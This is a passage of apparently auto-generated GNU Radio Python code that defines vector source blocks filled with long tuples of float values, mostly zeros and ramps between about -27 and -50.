0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,-27.0,-27.0,-27.1,-27.1,-27.2,-27.2,-27.3,-27.3,-27.3,-27.4,-27.4,-27.5,-27.5,-27.5,-27.6,-27.6,-27.7,-27.7,-27.8,-27.8,-27.8,-27.9,-27.9,-28.0,-28.0,-28.0,-28.1,-28.1,-28.2,-28.2,-28.3,-28.3,-28.3,-28.4,-28.4,-28.5,-28.5,-28.6,-28.6,-28.6,-28.7,-28.7,-28.8,-28.8,-28.8,-28.9,-28.9,-29.0,-29.0,-29.1,-29.1,-29.1,-29.2,-29.2,-29.3,-29.3,-29.3,-29.4,-29.4,-29.5,-29.5,-29.6,-29.6,-29.6,-29.7,-29.7,-29.8,-29.8,-29.8,-29.9,-29.9,-30.0,-30.0,-30.1,-30.1,-30.1,-30.2,-30.2,-30.3,-30.3,-30.4,-30.4,-30.4,-30.5,-30.5,-30.6,-30.6,-30.6,-30.7,-30.7,-30.8,-30.8,-30.9,-30.9,-30.9,-31.0,-31.0,-31.1,-31.1,-31.1,-31.2,-31.2,-31.3,-31.3,-31.4,-31.4,-31.4,-31.5,-31.5,-31.6,-31.6,-31.7,-31.7,-31.7,-31.8,-31.8,-31.9,-31.9,-31.9,-32.0,-32.0,-32.1,-32.1,-32.2,-32.2,-32.2,-32.3,-32.3,-32.4,-32.4,-32.4,-32.5,-32.5,-32.6,-32.6,-32.7,-32.7,-32.7,-32.8,-32.8,-32.9,-32.9,-32.9,-33.0,-33.0,-33.1,-33.1,-33.2,-33.2,-33.2,-33.3,-33.3,-33.4,-33.4,-33.5,-33.5,-33.5,-33.6,-33.6,-33.7,-33.7,-33.7,-33.8,-33.8,-33.9,-33.9,-34.0,-34.0,-34.0,-34.1,-34.1,-34.2,-34.2,-34.2,-34.3,-34.3,-34.4,-34.4,-34.5,-34.5,-34.5,-34.6,-34.6,-34.7,-34.7,-34.8,-34.8,-34.8,-34.9,-34.9,-35.0,-35.0,-35.0,-35.1,-35.1,-35.2,-35.2,-35.3,-35.3,-35.3,-35.4,-35.4,-35.5,-35.5,-35.5,-35.6,-35.6,-35.7,-35.7,-35.8,-35.8,-35.8,-35.9,-35.9,-36.0,-36.0,-36.0,-36.1,-36.1,-36.2,-36.2,-36.3,-36.3,-36.3,-36.4,-36.4,-36.5,-36.5,-36.6,-36.6,-36.6,-36.7,-36.7,-36.8,-36.8,-36.8,-36.9,-36.9,-37.0,-37.0,-37.1,-37.1,-37.1,-37.2,-37.2,-37.3,-37.3,-37.3,-37.4,-37.4,-37.5,-37.5,-37.6,-37.6,-37.6,-37.7,-37.7,-37.8,-37.8,-37.9,-37.9,-37.9,-38.0,-38.0,-38.1,-38.1,-38.1,-38.2,-38.2,-38.3,-38.3,-38.4,-38.4,-38.4,-38.5,-38.5,-38.6,-38.6,-38.6,-38.7,-38.7,-38.8,-38.8,-38.9,-38.9,-38.9,-39.0,-39.0,-39.1,-39.1,-39.1,-39.2,-39.2,-39.3,-39.3,-39.4,-39.4,-39.4,-39.5,-39.5,-39.6,-39.6,-39.7,-39.7,-39.7,-39.8,-39.8,-39.9,-39.9,-39.9,-40.0,-40.0,-40.1,-40.1,-40.2,-40.2,-40.2,-40.3,-40.3,-40.4,-40.4,-40.4,-40.5,-40.5,-40.6,-40.6,-40.7,-40.7,-40.7,-40.8,-40.8,-40.9,-40.9,-41.0,-41.0,-41.0,-41.1,-41.1,-41.2,-41.2,-41.2,-41.3,-41.3,-41.4,-41.4,-41.5,-41.5,-41.5,-41.6,-41.6,-41.7,-41.7,-41.7,-41.8,-41.8,-41.9,-41.9,-42.0,-42.0,-42.0,-42.1,-42.1,-42.2,-42.2,-42.2,-42.3,-42.3,-42.4,-42.4,-42.5,-42.5,-42.5,-42.6,-42.6,-42.7,-42.7,-42.8,-42.8,-42.8,-42.9,-42.9,-43.0,-43.0,-43.0,-43.1,-43.1,-43.2,-43.2,-43.3,-43.3,-43.3,-43.4,-43.4,-43.5,-43.5,-43.5,-43.6,-43.6,-43.7,-43.7,-43.8,-43.8,-43.8,-43.9,-43.9,-44.0,-44.0,-44.1,-44.1,-44.1,-44.2,-44.2,-44.3,-44.3,-44.3,-44.4,-44.4,-44.5,-44.5,-44.6,-44.6,-44.6,-44.7,-44.7,-44.8,-44.8,-44.8,-44.9,-44.9,-45.0,-45.0,-45.1,-45.1,-45.1,-45.2,-45.2,-45.3,-45.3,-45.3,-45.4,-45.4,-45.5,-45.5,-45.6,-45.6,-45.6,-45.7,-45.7,-45.8,-45.8,-45.9,-45.9,-45.9,-46.0,-46.0,-46.1,-46.1,-46.1,-46.2,-46.2,-46.3,-46.3,-46.4,-46.4,-46.4,-46.5,-46.5,-46.6,-46.6,-46.6,-46.7,-46.7,-46.8,-46.8,-46.9,-46.9,-46.9,-47.0,-47.0,-47.1,-47.1,-47.2,-47.2,-47.2,-47.3,-47.3,-47.4,-47.4,-47.4,-47.5,-47.5,-47.6,-47.6,-47.7,-47.7,-47.7,-47.8,-47.8,-47.9,-47.9,-47.9,-48.0,-48.0,-48.1,-48.1,-48.2,-48.2,-48.2,-48.3,-48.3,-48.4,-48.4,-48.4,-48.5,-48.5,-48.6,-48.6,-48.7,-48.7,-48.7,-48.8,-48.8,-48.9,-48.9,-49.0,-49.0,-49.0,-49.1,-49.1,-49.2,-49.2,-49.2,-49.3,-49.3,-49.4,-49.4,-49.5,-49.5,-49.5,-49.6,-49.6,-49.7,-49.7,-49.7,-49.8,-49.8,-49.9,-49.9,-50.0,-50.0), True, 1, [])
self.blocks_vector_source_x_0 = blocks.vector_source_f((-45.0,-45.0,-44.9,-44.9,-44.9,-44.8,-44.8,-44.8,-44.7,-44.7,-44.7,-44.6,-44.6,-44.6,-44.5,-44.5,-44.5,-44.4,-44.4,-44.4,-44.3,-44.3,-44.3,-44.2,-44.2,-44.2,-44.1,-44.1,-44.1,-44.0,-44.0,-44.0,-44.0,-43.9,-43.9,-43.9,-43.8,-43.8,-43.8,-43.7,-43.7,-43.7,-43.6,-43.6,-43.6,-43.5,-43.5,-43.5,-43.4,-43.4,-43.4,-43.3,-43.3,-43.3,-43.2,-43.2,-43.2,-43.1,-43.1,-43.1,-43.0,-43.0,-43.0,-42.9,-42.9,-42.9,-42.8,-42.8,-42.8,-42.7,-42.7,-42.7,-42.6,-42.6,-42.6,-42.5,-42.5,-42.5,-42.4,-42.4,-42.4,-42.3,-42.3,-42.3,-42.2,-42.2,-42.2,-42.1,-42.1,-42.1,-42.0,-42.0,-42.0,-42.0,-41.9,-41.9,-41.9,-41.8,-41.8,-41.8,-41.7,-41.7,-41.7,-41.6,-41.6,-41.6,-41.5,-41.5,-41.5,-41.4,-41.4,-41.4,-41.3,-41.3,-41.3,-41.2,-41.2,-41.2,-41.1,-41.1,-41.1,-41.0,-41.0,-41.0,-40.9,-40.9,-40.9,-40.8,-40.8,-40.8,-40.7,-40.7,-40.7,-40.6,-40.6,-40.6,-40.5,-40.5,-40.5,-40.4,-40.4,-40.4,-40.3,-40.3,-40.3,-40.2,-40.2,-40.2,-40.1,-40.1,-40.1,-40.0,-40.0,-40.0,-40.0,-39.9,-39.9,-39.9,-39.8,-39.8,-39.8,-39.7,-39.7,-39.7,-39.6,-39.6,-39.6,-39.5,-39.5,-39.5,-39.4,-39.4,-39.4,-39.3,-39.3,-39.3,-39.2,-39.2,-39.2,-39.1,-39.1,-39.1,-39.0,-39.0,-39.0,-38.9,-38.9,-38.9,-38.8,-38.8,-38.8,-38.7,-38.7,-38.7,-38.6,-38.6,-38.6,-38.5,-38.5,-38.5,-38.4,-38.4,-38.4,-38.3,-38.3,-38.3,-38.2,-38.2,-38.2,-38.1,-38.1,-38.1,-38.0,-38.0,-38.0,-38.0,-37.9,-37.9,-37.9,-37.8,-37.8,-37.8,-37.7,-37.7,-37.7,-37.6,-37.6,-37.6,-37.5,-37.5,-37.5,-37.4,-37.4,-37.4,-37.3,-37.3,-37.3,-37.2,-37.2,-37.2,-37.1,-37.1,-37.1,-37.0,-37.0,-37.0,-36.9,-36.9,-36.9,-36.8,-36.8,-36.8,-36.7,-36.7,-36.7,-36.6,-36.6,-36.6,-36.5,-36.5,-36.5,-36.4,-36.4,-36.4,-36.3,-36.3,-36.3,-36.2,-36.2,-36.2,-36.1,-36.1,-36.1,-36.0,-36.0,-36.0,-36.0,-35.9,-35.9,-35.9,-35.8,-35.8,-35.8,-35.7,-35.7,-35.7,-35.6,-35.6,-35.6,-35.5,-35.5,-35.5,-35.4,-35.4,-35.4,-35.3,-35.3,-35.3,-35.2,-35.2,-35.2,-35.1,-35.1,-35.1,-35.0,-35.0,-35.0,-34.9,-34.9,-34.9,-34.8,-34.8,-34.8,-34.7,-34.7,-34.7,-34.6,-34.6,-34.6,-34.5,-34.5,-34.5,-34.4,-34.4,-34.4,-34.3,-34.3,-34.3,-34.2,-34.2,-34.2,-34.1,-34.1,-34.1,-34.0,-34.0,-34.0,-34.0,-33.9,-33.9,-33.9,-33.8,-33.8,-33.8,-33.7,-33.7,-33.7,-33.6,-33.6,-33.6,-33.5,-33.5,-33.5,-33.4,-33.4,-33.4,-33.3,-33.3,-33.3,-33.2,-33.2,-33.2,-33.1,-33.1,-33.1,-33.0,-33.0,-33.0,-32.9,-32.9,-32.9,-32.8,-32.8,-32.8,-32.7,-32.7,-32.7,-32.6,-32.6,-32.6,-32.5,-32.5,-32.5,-32.4,-32.4,-32.4,-32.3,-32.3,-32.3,-32.2,-32.2,-32.2,-32.1,-32.1,-32.1,-32.0,-32.0,-32.0,-32.0,-31.9,-31.9,-31.9,-31.8,-31.8,-31.8,-31.7,-31.7,-31.7,-31.6,-31.6,-31.6,-31.5,-31.5,-31.5,-31.4,-31.4,-31.4,-31.3,-31.3,-31.3,-31.2,-31.2,-31.2,-31.1,-31.1,-31.1,-31.0,-31.0,-31.0,-30.9,-30.9,-30.9,-30.8,-30.8,-30.8,-30.7,-30.7,-30.7,-30.6,-30.6,-30.6,-30.5,-30.5,-30.5,-30.4,-30.4,-30.4,-30.3,-30.3,-30.3,-30.2,-30.2,-30.2,-30.1,-30.1,-30.1,-30.0,-30.0,-30.0,-30.0,-29.9,-29.9,-29.9,-29.8,-29.8,-29.8,-29.7,-29.7,-29.7,-29.6,-29.6,-29.6,-29.5,-29.5,-29.5,-29.4,-29.4,-29.4,-29.3,-29.3,-29.3,-29.2,-29.2,-29.2,-29.1,-29.1,-29.1,-29.0,-29.0,-29.0,-28.9,-28.9,-28.9,-28.8,-28.8,-28.8,-28.7,-28.7,-28.7,-28.6,-28.6,-28.6,-28.5,-28.5,-28.5,-28.4,-28.4,-28.4,-28.3,-28.3,-28.3,-28.2,-28.2,-28.2,-28.1,-28.1,-28.1,-28.0,-28.0,-28.0,-28.0,-27.9,-27.9,-27.9,-27.8,-27.8,-27.8,-27.7,-27.7,-27.7,-27.6,-27.6,-27.6,-27.5,-27.5,-27.5,-27.4,-27.4,-27.4,-27.3,-27.3,-27.3,-27.2,-27.2,-27.2,-27.1,-27.1,-27.1,-27.0,-27.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0